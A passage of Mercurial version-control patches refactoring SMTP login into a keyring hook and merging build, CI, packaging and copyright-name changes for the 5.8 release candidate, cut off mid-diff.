$ cat clone-output-2 - adding [s] undo.backup.00manifest.n (70 bytes) (known-bad-output !) - adding [s] undo.backup.00changelog.n (70 bytes) (known-bad-output !) adding [s] 00manifest.n (70 bytes) adding [s] 00manifest-*.nd (118 KB) (glob) adding [s] 00changelog.n (70 bytes) # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618867617 14400 # Mon Apr 19 17:26:57 2021 -0400 # Node ID 83c0d144ef8d929de662dc5cbdead4127251c35c # Parent 0b569c75d1808f05056e3e779993186ceded830f mail: split out the SMTP login to allow the keyring extension to wrap it The keyring extension only needs to tweak this tiny section of the larger function. But without any place to intercept the username/password fetching, it copy/pasted the entire function, and has grown a bunch of compatibility hacks to support older versions of Mercurial as well. Differential Revision: https://phab.mercurial-scm.org/D10471 diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -151,6 +151,32 @@ if starttls or smtps: ui.note(_(b'(verifying remote certificate)\n')) sslutil.validatesocket(s.sock) + + try: + _smtp_login(ui, s, mailhost, mailport) + except smtplib.SMTPException as inst: + raise error.Abort(stringutil.forcebytestr(inst)) + + def send(sender, recipients, msg): + try: + return s.sendmail(sender, recipients, msg) + except smtplib.SMTPRecipientsRefused as inst: + recipients = [r[1] for r in inst.recipients.values()] + raise error.Abort(b'\n' + b'\n'.join(recipients)) + except smtplib.SMTPException as inst: + raise error.Abort(inst) + + return send + + +def _smtp_login(ui, smtp, mailhost, mailport): + """A hook for the keyring extension to perform the actual SMTP login. + + An already connected SMTP object of the proper type is provided, based on + the current configuration. The host and port to which the connection was + established are provided for accessibility, since the SMTP object doesn't + provide an accessor. ``smtplib.SMTPException`` is raised on error. + """ username = ui.config(b'smtp', b'username') password = ui.config(b'smtp', b'password') if username: @@ -163,21 +189,7 @@ if username and password: ui.note(_(b'(authenticating to mail server as %s)\n') % username) username = encoding.strfromlocal(username) - try: - s.login(username, password) - except smtplib.SMTPException as inst: - raise error.Abort(stringutil.forcebytestr(inst)) - - def send(sender, recipients, msg): - try: - return s.sendmail(sender, recipients, msg) - except smtplib.SMTPRecipientsRefused as inst: - recipients = [r[1] for r in inst.recipients.values()] - raise error.Abort(b'\n' + b'\n'.join(recipients)) - except smtplib.SMTPException as inst: - raise error.Abort(inst) - - return send + smtp.login(username, password) def _sendmail(ui, sender, recipients, msg): # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618879132 14400 # Mon Apr 19 20:38:52 2021 -0400 # Node ID 5fa019ceb49950dccd1bb28dc4a16f657a083e4c # Parent 83c0d144ef8d929de662dc5cbdead4127251c35c mail: force SMTPException to bytes before wrapping in error.Abort Pytype wasn't complaining about this for some reason, but PyCharm was and we already handle another instance of this exception the same way in this function. Differential Revision: https://phab.mercurial-scm.org/D10473 diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -164,7 +164,7 @@ recipients = [r[1] for r in inst.recipients.values()] raise error.Abort(b'\n' + b'\n'.join(recipients)) except smtplib.SMTPException as inst: - raise error.Abort(inst) + raise error.Abort(stringutil.forcebytestr(inst)) return send # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1618930866 14400 # Tue Apr 20 11:01:06 2021 -0400 # Branch stable # Node ID f67b8946bb1b6cfa8328dbf8d6a9128b69ccdcb4 # Parent bc268ea9f9843d65586186c0c735001510dd1daf # Parent 5fa019ceb49950dccd1bb28dc4a16f657a083e4c merge: default into stable for 5.8 rc diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -68,6 +68,12 @@ build: $(PYTHON) setup.py $(PURE) build $(COMPILERFLAG) +build-chg: + make -C contrib/chg + +build-rhg: + (cd rust/rhg; cargo build --release) + wheel: FORCE_SETUPTOOLS=1 $(PYTHON) setup.py $(PURE) bdist_wheel $(COMPILERFLAG) @@ -96,6 +102,9 @@ install-bin: build $(PYTHON) setup.py $(PURE) install --root="$(DESTDIR)/" --prefix="$(PREFIX)" --force +install-chg: build-chg + make -C contrib/chg install PREFIX="$(PREFIX)" + install-doc: doc cd doc && $(MAKE) $(MFLAGS) install @@ -107,6 +116,9 @@ install-home-doc: doc cd doc && $(MAKE) $(MFLAGS) PREFIX="$(HOME)" install +install-rhg: build-rhg + install -m 755 rust/target/release/rhg "$(PREFIX)"/bin/ + MANIFEST-doc: $(MAKE) -C doc MANIFEST @@ -175,7 +187,7 @@ $(PYFILESCMD) | xargs \ xgettext --package-name "Mercurial" \ --msgid-bugs-address "<mercurial-devel@mercurial-scm.org>" \ - --copyright-holder "Matt Mackall <mpm@selenic.com> and others" \ + --copyright-holder "Olivia Mackall <olivia@selenic.com> and others" \ --from-code ISO-8859-1 --join --sort-by-file --add-comments=i18n: \ -d hg -p i18n -o hg.pot.tmp $(PYTHON) i18n/posplit i18n/hg.pot.tmp diff --git a/README.rst b/README.rst --- a/README.rst +++ b/README.rst @@ -18,3 +18,13 @@ See https://mercurial-scm.org/ for detailed installation instructions, platform-specific notes, and Mercurial user information. + +Notes for packagers +=================== + +Mercurial ships a copy of the python-zstandard sources. This is used to +provide support for zstd compression and decompression functionality. The +module is not intended to be replaced by the plain python-zstandard nor +is it intended to use a system zstd library. Patches can result in hard +to diagnose errors and are explicitly discouraged as unsupported +configuration. diff --git a/black.toml b/black.toml deleted file mode 100644 --- a/black.toml +++ /dev/null @@ -1,14 +0,0 @@ -[tool.black] -line-length = 80 -exclude = ''' -build/ -| wheelhouse/ -| dist/ -| packages/ -| \.hg/ -| \.mypy_cache/ -| \.venv/ -| mercurial/thirdparty/ -''' -skip-string-normalization = true -quiet = true diff --git a/contrib/all-revsets.txt b/contrib/all-revsets.txt --- a/contrib/all-revsets.txt +++ b/contrib/all-revsets.txt @@ -46,8 +46,8 @@ # Used in revision c1546d7400ef min(0::) # Used in revision 546fa6576815 -author(lmoscovicz) or author(mpm) -author(mpm) or author(lmoscovicz) +author(lmoscovicz) or author(olivia) +author(olivia) or author(lmoscovicz) # Used in revision 9bfe68357c01 public() and id("d82e2223f132") # Used in revision ba89f7b542c9 @@ -100,7 +100,7 @@ draft() and ::tip ::tip and draft() author(lmoscovicz) -author(mpm) +author(olivia) ::p1(p1(tip)):: public() :10000 and public() @@ -130,7 +130,7 @@ head() head() - public() draft() and head() -head() and author("mpm") +head() and author("olivia") # testing the mutable phases set draft() diff --git a/contrib/base-revsets.txt b/contrib/base-revsets.txt --- a/contrib/base-revsets.txt +++ b/contrib/base-revsets.txt @@ -25,9 +25,9 @@ 0::tip roots(0::tip) author(lmoscovicz) -author(mpm) -author(lmoscovicz) or author(mpm) -author(mpm) or author(lmoscovicz) +author(olivia) +author(lmoscovicz) or author(olivia) +author(olivia) or author(lmoscovicz) tip:0 0:: # those two `roots(...)` inputs are close to what phase movement use. diff --git a/contrib/check-code.py b/contrib/check-code.py --- a/contrib/check-code.py +++ b/contrib/check-code.py @@ -2,7 +2,7 @@ # # check-code - a style and portability checker for Mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/check-commit b/contrib/check-commit --- a/contrib/check-commit +++ b/contrib/check-commit @@ -1,6 +1,6 @@ #!/usr/bin/env python3 # -# Copyright 2014 Matt Mackall <mpm@selenic.com> +# Copyright 2014 Olivia Mackall <olivia@selenic.com> # # A tool/hook to run basic sanity checks on commits/patches for # submission to Mercurial. Install by adding the following to your diff --git a/contrib/check-config.py b/contrib/check-config.py --- a/contrib/check-config.py +++ b/contrib/check-config.py @@ -2,7 +2,7 @@ # # check-config - a config flag documentation checker for Mercurial # -# Copyright 2015 Matt Mackall <mpm@selenic.com> +# Copyright 2015 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/chg/chg.1 b/contrib/chg/chg.1 --- a/contrib/chg/chg.1 +++ b/contrib/chg/chg.1 @@ -36,6 +36,6 @@ .B \-\-kill\-chg\-daemon Terminate the background command servers. .SH SEE ALSO -.BR hg (1), +.BR hg (1) .SH AUTHOR Written by Yuya Nishihara <yuya@tcha.org>. diff --git a/contrib/clang-format-ignorelist b/contrib/clang-format-ignorelist --- a/contrib/clang-format-ignorelist +++ b/contrib/clang-format-ignorelist @@ -9,3 +9,4 @@ hgext/fsmonitor/pywatchman/**.c mercurial/thirdparty/**.c mercurial/thirdparty/**.h +mercurial/pythoncapi_compat.h diff --git a/contrib/examples/fix.hgrc b/contrib/examples/fix.hgrc --- a/contrib/examples/fix.hgrc +++ b/contrib/examples/fix.hgrc @@ -5,7 +5,7 @@ rustfmt:command = rustfmt +nightly rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**" -black:command = black --config=black.toml - +black:command = black --config=pyproject.toml - black:pattern = set:**.py - mercurial/thirdparty/** # Mercurial doesn't have any Go code, but if we did this is how we diff --git a/contrib/fuzz/Makefile b/contrib/fuzz/Makefile --- a/contrib/fuzz/Makefile +++ b/contrib/fuzz/Makefile @@ -1,5 +1,5 @@ -CC = clang -CXX = clang++ +CC ?= clang +CXX ?= clang++ # By default, use our own standalone_fuzz_target_runner. # This runner does no fuzzing, but simply executes the inputs @@ -10,6 +10,15 @@ # OSS-Fuzz will define its own value for LIB_FUZZING_ENGINE. LIB_FUZZING_ENGINE ?= standalone_fuzz_target_runner.o +# Default to Python 3. +# +# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is. +ifeq ($(OS),Windows_NT) +PYTHON?=py -3 +else +PYTHON?=python3 +endif + PYTHON_CONFIG ?= $$OUT/sanpy/bin/python-config PYTHON_CONFIG_FLAGS ?= --ldflags --embed @@ -20,7 +29,7 @@ standalone_fuzz_target_runner.o: standalone_fuzz_target_runner.cc $$OUT/%_fuzzer_seed_corpus.zip: %_corpus.py - python $< $@ + $(PYTHON) $< $@ pyutil.o: pyutil.cc pyutil.h $(CXX) $(CXXFLAGS) -g -O1 \ diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -7,6 +7,8 @@ variables: PYTHON: python TEST_HGMODULEPOLICY: "allow" + HG_CI_IMAGE_TAG: "latest" + TEST_HGTESTS_ALLOW_NETIO: "0" .runtests_template: &runtests stage: tests @@ -17,21 +19,12 @@ - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'` - cd /tmp/mercurial-ci/ - ls -1 tests/test-check-*.* > /tmp/check-tests.txt + - black --version + - clang-format --version script: - echo "python used, $PYTHON" - echo "$RUNTEST_ARGS" - - HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS - - -.rust_template: &rust - before_script: - - hg clone . /tmp/mercurial-ci/ --noupdate --config phases.publish=no - - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'` - - ls -1 tests/test-check-*.* > /tmp/check-tests.txt - - cd /tmp/mercurial-ci/rust/rhg - - cargo build - - cd /tmp/mercurial-ci/ - + - HGTESTS_ALLOW_NETIO="$TEST_HGTESTS_ALLOW_NETIO" HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS checks-py2: <<: *runtests @@ -58,14 +51,23 @@ phabricator-refresh: stage: phabricator + variables: + DEFAULT_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)" + STABLE_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\n⚠ This patch is intended for stable ⚠\n{image https://media.giphy.com/media/nYI8SmmChYXK0/source.gif}" script: - - "./contrib/phab-refresh-stack.sh --comment \":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\"" + - | + if [ `hg branch` == "stable" ]; then + ./contrib/phab-refresh-stack.sh --comment "$STABLE_COMMENT"; + else + ./contrib/phab-refresh-stack.sh --comment "$DEFAULT_COMMENT"; + fi test-py2: <<: *runtests variables: RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt" TEST_HGMODULEPOLICY: "c" + TEST_HGTESTS_ALLOW_NETIO: "1" test-py3: <<: *runtests @@ -73,6 +75,7 @@ RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt" PYTHON: python3 TEST_HGMODULEPOLICY: "c" + TEST_HGTESTS_ALLOW_NETIO: "1" test-py2-pure: <<: *runtests @@ -89,7 +92,6 @@ test-py2-rust: <<: *runtests - <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" @@ -97,13 +99,20 @@ test-py3-rust: <<: *runtests - <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" PYTHON: python3 TEST_HGMODULEPOLICY: "rust+c" +test-py3-rhg: + <<: *runtests + variables: + HGWITHRUSTEXT: cpython + RUNTEST_ARGS: "--rust --rhg --blacklist /tmp/check-tests.txt" + PYTHON: python3 + TEST_HGMODULEPOLICY: "rust+c" + test-py2-chg: <<: *runtests variables: diff --git a/contrib/hg-test-mode.el b/contrib/hg-test-mode.el --- a/contrib/hg-test-mode.el +++ b/contrib/hg-test-mode.el @@ -1,6 +1,6 @@ ;; hg-test-mode.el - Major mode for editing Mercurial tests ;; -;; Copyright 2014 Matt Mackall <mpm@selenic.com> +;; Copyright 2014 Olivia Mackall <olivia@selenic.com> ;; "I have no idea what I'm doing" ;; ;; This software may be used and distributed according to the terms of the diff --git a/contrib/hgperf b/contrib/hgperf --- a/contrib/hgperf +++ b/contrib/hgperf @@ -2,7 +2,7 @@ # # hgperf - measure performance of Mercurial commands # -# Copyright 2014 Matt Mackall <mpm@selenic.com> +# Copyright 2014 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/logo-droplets.svg b/contrib/logo-droplets.svg --- a/contrib/logo-droplets.svg +++ b/contrib/logo-droplets.svg @@ -1,5 +1,5 @@ <?xml version="1.0" encoding="UTF-8" standalone="no"?> <!-- Created with Inkscape (http://www.inkscape.org/) --> -<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Matt Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata> +<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Olivia Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata> <rect id="rect6847" stroke-linejoin="miter" style="stroke-dasharray:none;" height="150.12" width="124.77" stroke="#000" stroke-miterlimit="4" y="0.98776" x="0.3169" stroke-width="1.9755" fill="#FFF"/><path id="text2611" style="stroke-dasharray:none;" d="M9.848,124.61c1.777-0.79,3.665-1.18,5.479-1.18,1.74,0,2.851,0.43,3.48,1.32,1.332-0.89,3.146-1.32,4.553-1.32,4.221,0,4.369,1.71,4.369,6.73v11.11c0,0.49,0.074,0.49-2.036,0.49v-11.81c0-3.63-0.074-4.74-2.48-4.74-1.073,0-2.184,0.25-3.369,1.03v15.27c-0.037,0.15-0.111,0.18-0.369,0.22-0.038,0-0.074,0.03-0.112,0.03h-1.555v-11.81c0-3.49,0-4.77-2.517-4.77-1.074,0-2.147,0.21-3.406,0.82v15.27c0,0.49,0.074,0.49-2.0361,0.49v-17.15m27.831-1.18c-3.146,0-6.626,0.89-6.626,10.4,0,7.33,2.554,8.47,6.071,8.47,2.701,0,5.034-0.89,5.034-1.32,0-0.53-0.074-1.35-0.259-1.82-1.148,0.79-2.777,1.21-4.59,1.21-2.48,0-4.146-0.71-4.184-6.22,1.629,0,5.776-0.04,8.848-0.65,0.259-1.17,0.37-2.88,0.37-4.37,0-3.56-1.444-5.7-4.664-5.7m-0.185,1.78c2.221,0,2.813,1.46,2.85,4.31,0,0.75-0.037,1.64-0.148,2.49-2.073,0.5-5.591,0.5-7.072,0.5,0.261-6.48,2.481-7.3,4.37-7.3m8.07-0.21c1.739-1.14,3.332-1.57,4.961-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.112,0.96-0.297,1.31-0.519-0.28-1.11-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m18.69-0.39c0-0.47-1.554-1.18-3.11-1.18-2.999,0-6.664,1.03-6.664,9.83,0,8.33,2.222,9.07,6.109,9.07,1.924,0,3.665-1.03,3.665-1.6,0-0.32-0.074-0.82-0.26-1.24-0.778,0.56-1.962,1.1-3.22,1.1-2.665,0-4.22-0.75-4.22-7.23,0-7.15,2.554-8.15,4.775-8.15,1.258,0,1.962,0.36,2.665,0.82,0.186-0.43,0.26-1.03,0.26-1.42m14.181,16.55c-1.63,0.82-3.776,1.14-5.627,1.14-4.739,0-5.442-1.99-5.442-6.73v-11.14c0-0.46-0.037-0.46,2.074-0.46v11.82c0,3.56,0.517,4.77,3.294,4.77,1.073,0,2.554-0.22,3.665-0.86v-15.27c0-0.46-0.074-0.46,2.036-0.46v17.19m4.221-16.16c1.739-1.14,3.332-1.57,4.96-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.111,0.96-0.296,1.31-0.519-0.28-1.111-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m12.379-1.03c-1.629,0-2.11,0-2.11,0.96v16.83c2.073,0,2.11,0,2.11-0.49v-17.3m-2.184-6.27c0,1.18,0.37,1.6,1.11,1.64,0.851,0,1.259-0.61,1.259-1.67,0.037-1.11-0.26-1.61-1.111-1.61-0.814,0-1.221,0.61-1.258,1.64m5.696,7.3c0-0.39,0.074-0.61,0.222-0.71,0.704-0.39,3.41-0.86,6.48-0.86,2.33,0,3.81,1.11,3.81,4.31v2.31c0,6.34-0.18,11.07-0.18,11.07-0.85,0.47-2.45,1.18-5.04,1.18-2.66,0.03-5.329-0.22-5.329-5.48,0-5.02,2.739-5.81,5.479-5.81,1.04,0,2.26,0.11,3.07,0.43v-3.31c0-2.31-1.18-2.81-2.59-2.81-1.89,0-4.514,0.35-5.662,0.89-0.222-0.39-0.26-1-0.26-1.21m8.512,7.9c-0.7-0.25-1.7-0.35-2.4-0.35-2.11,0-4.04,0.42-4.04,4.34,0,3.66,1.59,3.7,3.48,3.7,1.19,0,2.37-0.32,2.78-0.75,0,0,0.18-4.27,0.18-6.94m7.86,8.37c0,0.49,0.04,0.49-2.04,0.49v-25.2c0-0.96,0.41-0.96,2.04-0.96v25.67" stroke-miterlimit="4" stroke-width="2.02999997" fill="#010101"/><g id="g4503" transform="matrix(0.9351326,0,0,0.9351326,150.39508,-1.251766)"><path id="path2339" fill="#1b1a1b" d="M-45.75,92.692c20.04-33.321-4.232-87.363-48.614-81.873-40.096,4.958-40.746,47.165-5.405,57.191,30.583,8.685,6.318,28.084,7.027,41,0.712,12.92,26.587,17.6,46.992-16.318z"/><circle id="circle2341" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="85.364" cx="33.728" r="15.414" fill="#1b1a1b"/><path id="path2343" fill="#1b1a1b" d="M-140.06,48.936c-6.26,0.606-10.84,6.164-10.24,12.422,0.61,6.262,6.17,10.847,12.43,10.241,6.26-0.614,10.84-6.171,10.23-12.43-0.61-6.253-6.16-10.839-12.42-10.233z"/><path id="path2561" fill="#bfbfbf" d="M-44.993,91.34c20.041-33.321-4.231-87.363-48.613-81.873-40.104,4.9568-40.744,47.166-5.406,57.193,30.583,8.684,6.318,28.083,7.027,41,0.713,12.92,26.587,17.6,46.992-16.32z"/><path id="path2563" fill="#000" d="M-86.842,112.76c-1.215-1.97,0.642-4.16,2.551-3.99,3.039,0.26,9.655-0.04,14.876-3,13.043-7.39,33.114-42.966,23.019-65.405-4.519-10.044-6.72-12.92-11.374-17.833-0.95-1.002-0.405-0.948,0.238-0.609,2.517,1.321,6.94,6.437,11.477,14.765,7.664,14.069,7.267,30.795,4.416,41.287-1.986,7.299-8.825,23.815-18.842,30.955-10.039,7.15-21.785,11.26-26.361,3.83z"/><path id="path2565" fill="#000" d="M-95.93,66.591c-6.83-2.028-15.64-4.853-20.74-11.517-3.75-4.914-5.66-10.277-6.15-13.318-0.17-1.085-0.32-1.991-0.01-2.24,0.15-0.117,2.81,5.896,6.79,10.936,3.97,5.04,9.53,7.988,14.16,9.059,4.117,0.952,12.646,3.044,15.532,5.503,2.967,2.527,3.215,7.987,2.216,8.603-1.006,0.62-3.048-4.429-11.798-7.026z"/><path id="path2567" fill="#FFF" d="M-81.841,113.72c-0.132,1.57,1.665,1.87,4.083,1.51,3.099-0.46,5.72-0.81,9.287-2.6,4.835-2.42,9.728-5.89,13.312-10.57,10.692-13.945,14.478-30.45,13.895-32.824-0.195,1.961-2.776,12.253-8.679,21.532-7.582,11.922-13.079,18.262-25.758,21.342-3.529,0.86-5.967-0.45-6.14,1.61z"/><path id="path2569" fill="#FFF" d="M-109.96,59.479c1.44,1.225,4.4,2.857,10.223,4.767,7.031,2.305,10.455,4.304,11.888,5.262,1.52,1.018,2.483,3.288,2.578,1.272,0.099-2.019-1.145-3.755-3.921-4.675-1.878-0.624-5.038-2.109-8.067-2.707-1.946-0.384-5.111-1.146-7.831-1.978-1.48-0.457-3-1.258-4.87-1.941z"/><circle id="circle2577" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="84.375" cx="34.681" r="15.414" fill="#bfbfbf"/><path id="path2579" fill="#000" d="M-128.68,108.38c13.53,12.54,33.894-4.69,24.93-19.897-1.01-1.708-2.32-3.009-1.89-1.7,2.87,8.747,0.22,15.667-4.72,19.227-4.85,3.5-11.51,4.09-16.84,1.32-1.57-0.81-2.22,0.37-1.48,1.05z"/><path id="path2585" fill="#FFF" d="M-118.07,110.95c1.73-0.36,11.75-2.95,14.1-11.194,0.73-2.569,0.86-2.053,0.66-0.661-1.06,7.105-7.78,12.345-13.49,12.545-1.16,0.12-2.68-0.39-1.27-0.69z"/><path id="path2589" fill="#bfbfbf" d="M-139.3,47.584c-6.26,0.605-10.84,6.164-10.24,12.422,0.61,6.261,6.17,10.847,12.43,10.241,6.25-0.614,10.84-6.173,10.23-12.431-0.61-6.254-6.17-10.838-12.42-10.232z"/><path id="path2591" fill="#000" d="M-144.47,67.571c0.07,0.805,1.17,1.838,2.9,2.312,1.49,0.408,5.32,1.45,10.25-1.658,4.92-3.108,5.49-11.421,3.25-13.865-0.69-1.239-1.59-2.14-0.88-0.164,1.81,4.99-1.7,9.659-4.74,11.82-3.03,2.162-6.88,1.139-8.45,0.66s-2.4,0.064-2.33,0.895z"/><path id="path2597" fill="#FFF" d="M-138.11,68.688c0.45-0.406,2.73-0.24,4.79-1.35,2.07-1.109,4.52-3.54,4.95-6.994,0.26-2.029,0.34-1.519,0.44-0.415-0.32,5.743-5.6,8.916-8.62,9.334-0.82,0.113-2.25,0.044-1.56-0.575z"/><path id="path2561_1_" fill="#999" d="M-47.767,69.694c8.532-24.594-9.323-61.736-45.446-57.268-32.637,4.035-33.167,38.389-4.4,46.55,32.582,4.933,12.962,29.512,10.179,41.904-2.495,11.11,26.331,12.94,39.667-31.186z"/><path id="path2571" fill="#f3f3f3" d="M-70.093,88.904c-8.827-1.092-21.529,18.836-9.552,16.506,5.756-0.86,10.525-2.89,14.794-7.762,5.567-6.353,13.883-20.074,16.288-28.94,2.025-7.476,1.007-19.057-1.081-8.175-2.142,11.167-11.623,29.464-20.449,28.371z"/><path id="path2581" fill="#999" d="M-129.39,104.85c2.05,0.03,3.28,0.32,5.35,1.77,4.09,1.7,11.61,0.62,15.09-3.95,3.47-4.57,3.58-10.868,2.26-14.674-3.24-9.314-16.99-9.149-23.13-1.417-6.64,8.636-1.61,18.231,0.43,18.271z"/><path id="path2593_2_" fill="#999" d="M-147.64,61.684c0.41,1.282,1.45,3.154,3.65,3.466,2.94,0.417,3.54,1.743,7,1.055,3.47-0.688,6.09-3.528,7.14-6.67,1.21-4.347-0.59-6.591-3.31-8.595-2.71-2.003-8.67-1.788-12.23,1.458-2.53,2.305-3.24,6.163-2.25,9.286z"/><path id="path256" fill="#f3f3f3" d="M-136.11,64.558c2.66-0.697,6.18-4.325,4.44-7.096-2.16-3.413-8.17-0.491-8.37,3.309-0.21,3.802,1.11,4.526,3.93,3.787z"/><path id="path258" fill="#f3f3f3" d="M-116.12,105.51c2.28-0.6,9.24-3.43,7.93-13.547-0.66-5.126-3.46,6.361-8.63,8.077-7.85,2.61-6.97,7.48,0.7,5.47z"/></g> </svg> diff --git a/contrib/memory.py b/contrib/memory.py --- a/contrib/memory.py +++ b/contrib/memory.py @@ -1,6 +1,6 @@ # memory.py - track memory usage # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/packaging/debian/control b/contrib/packaging/debian/control --- a/contrib/packaging/debian/control +++ b/contrib/packaging/debian/control @@ -25,7 +25,9 @@ Suggests: wish Replaces: mercurial-common Breaks: mercurial-common +Provides: python3-mercurial Architecture: any +Homepage: https://www.mercurial-scm.org/ Description: fast, easy to use, distributed revision control tool. Mercurial is a fast, lightweight Source Control Management system designed for efficient handling of very large distributed projects. diff --git a/contrib/packaging/debian/copyright b/contrib/packaging/debian/copyright --- a/contrib/packaging/debian/copyright +++ b/contrib/packaging/debian/copyright @@ -3,7 +3,7 @@ Source: https://www.mercurial-scm.org/ Files: * -Copyright: 2005-2021, Matt Mackall <mpm@selenic.com> and others. +Copyright: 2005-2021, Olivia Mackall <olivia@selenic.com> and others. License: GPL-2+ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public diff --git a/contrib/packaging/debian/rules b/contrib/packaging/debian/rules --- a/contrib/packaging/debian/rules +++ b/contrib/packaging/debian/rules @@ -18,6 +18,10 @@ # DEB_HG_PYTHON_VERSIONS="3.7 3.8" make deb DEB_HG_MULTI_VERSION?=0 +# Set to 1 to make /usr/bin/hg a symlink to chg, and move hg to +# /usr/lib/mercurial/hg. +DEB_HG_CHG_BY_DEFAULT?=0 + CPUS=$(shell cat /proc/cpuinfo | grep -E ^processor | wc -l) # By default, only build for the version of python3 that the system considers @@ -40,6 +44,12 @@ DEB_HG_PYTHON_VERSIONS?=$(shell py3versions -vd) endif +ifeq ($(DEB_HG_CHG_BY_DEFAULT), 1) + # Important: the "real" hg must have a 'basename' of 'hg'. Otherwise, hg + # behaves differently when setting $HG and breaks aliases that use that. + export HGPATH=/usr/lib/mercurial/hg +endif + export HGPYTHON3=1 export PYTHON=python3 @@ -86,3 +96,8 @@ cp contrib/bash_completion "$(CURDIR)"/debian/mercurial/usr/share/bash-completion/completions/hg mkdir -p "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions cp contrib/zsh_completion "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions/_hg + if [ "$(DEB_HG_CHG_BY_DEFAULT)" -eq 1 ]; then \ + mkdir -p "$(CURDIR)"/debian/mercurial/usr/lib/mercurial; \ + mv "$(CURDIR)"/debian/mercurial/usr/bin/hg "$(CURDIR)"/debian/mercurial/usr/lib/mercurial/hg; \ + ln -s chg "$(CURDIR)"/debian/mercurial/usr/bin/hg; \ + fi diff --git a/contrib/packaging/hgpackaging/util.py b/contrib/packaging/hgpackaging/util.py --- 